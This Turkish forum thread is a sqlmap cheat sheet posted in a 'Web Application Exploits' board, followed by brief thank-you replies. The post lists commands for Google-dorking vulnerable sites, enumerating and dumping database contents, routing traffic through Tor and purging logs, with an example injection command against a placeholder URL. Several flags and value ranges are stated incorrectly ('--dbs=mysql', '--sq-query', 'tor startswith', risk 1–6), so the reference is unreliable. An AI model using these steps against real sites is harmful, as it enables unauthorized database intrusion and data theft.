1.                                                

sqlmap kullanımı

'Web Application Exploits' forumunda sen4tor tarafından 30 Ocak 2017 tarihinde açılan konu

  1. sen4tor

    sen4tor Member

    Katılım:
    1 Ocak 2017
    Mesaj:
    67
    Beğeniler:
    15
    Ödül Puanları:
    8
    Cinsiyet:
    Erkek

    Merhaba arkadaşlar,

    Bu yazımda en popüler sql injection programı sqlmap'in kullanımına değinmek istiyorum. Umarım faydalı bir yazı olur.

    Sqlmap nedir ?

    Sqlmap; sql tabanlı programların üzerinde penetrasyon testleri yapmamızı sağlayan python programlama dili ile yazılmış bir araçtır. Kali Linux ve linux dağıtımları üzerinde kurulu olarak gelmektedir. Tabii ki windows için de bir versiyonu mevcut. Sqlmapi windows'a nasıl kurabiliriz kısaca özetleyecek olursak: Öncelikle python dilini https://www.python.org/downloads/ adresinden indirip kurun. Daha sonra sqlmapi github üzerinden https://github.com/sqlmapproject/sqlmap bu bağlantıdan indirip herhangi bir yere çıkarın.
    Daha sonra cmd komut satırıyla çıkardığınız klasöre gelip "sqlmap.py" yazıp enter'a basın. "sqlmap.py" is not found .. gibi bir hata almazsanız herşey yolunda demektir.

    Şimdi sqlmap üzerinde kullanabileceğimiz komutlara bir göz atalım.

    Yanıt Parametreleri
    y = yes
    n = no
    q= exit

    Google'da Dork Arama
    -g inurl:"dork adını buraya girin"

    Hedef Sitede Dork Arama
    -u "http://example.com/index.php?id="

    Veritabanı adı Bulma
    --dbs

    Vtys tipine göre veritabanı adı bulma
    --dbs=mysql --dbs=oracle

    Bulunan Veritabanındaki tablolaro bulma
    -D veritabaniadi --tables

    Bulunan Tablo isimlerinden kolonları bulma
    -T tabloadi --columns

    Bulunan kolonlardaki veriyi çekmek
    -C alan1,alan2 --dump

    Tor Başlatma
    tor startswith

    Tor Type
    tor=http

    Anamakina ismini bulmak
    --hostname

    Kullanıcı yetkilerini bulmak
    --roles

    Veritabanı kullanıcı adını seçmek
    -U username

    Tarama tekniğini belirleme
    --technique="BEST"

    Sorgu yapmak
    -D veritabaniadi --sq-query="select * from tablo"

    Dosya içindeki satırlarla dork arama
    -m "dosya.txt"

    Tarayıcı değiştirme
    --user-agent="Mozilla/5.0 (Windows NT 6.3; rv:36.0)"

    Proxy kullanma
    -proxy="http://127.0.0.1"

    Log kayıtlarını silme
    --purge-output

    Örnek kullanım:
    sqlmap.py -u "http://example.com/index.php?id=" --dbs --level=2 --risk=4

    Burada level ve risk parametreleri daha detaylı tarama yapılmasını sağlar. Level ve risk parametreleri 1-6 arasındadır.

    İlla ki eksikler vardır arkadaşlar. Eksik gördüğünüz yerleri yorum olarak atabilirsiniz. Aklıma geldikçe ekleme yapacağım. Bir sonraki yazıda senaryo üzerinden sqlmapi nasıl daha etkili kullanabiliriz onu anlatmaya çalışaçağım.
    İyi forumlar dilerim.
     
    Son düzenleme: 30 Ocak 2017
  2. Dark Warrior

    Dark Warrior Member

    Katılım:
    10 Eylül 2014
    Mesaj:
    109
    Beğeniler:
    21
    Ödül Puanları:
    18
    Cinsiyet:
    Erkek
    Meslek:
    Bilgi İşlem Sorumlusu
    Şehir:
    Van
    Ellerine Sağlık Kardeşim.
     
  3. sen4tor

    sen4tor Member

    Katılım:
    1 Ocak 2017
    Mesaj:
    67
    Beğeniler:
    15
    Ödül Puanları:
    8
    Cinsiyet:
    Erkek
    Rica ederim faydalı olduysa ne mutlu :)
     
  4. RichWarrior

    RichWarrior Albay

    Katılım:
    19 Şubat 2016
    Mesaj:
    275
    Beğeniler:
    85
    Ödül Puanları:
    28
    Şehir:
    (34) İstanbul Avrupa
    Web Sitesi:
    Tamper Scriptleri Hakkında Biraz Bilgi Verilse Çok Güzel Olurmuş
     

Bu Sayfayı Paylaş

Share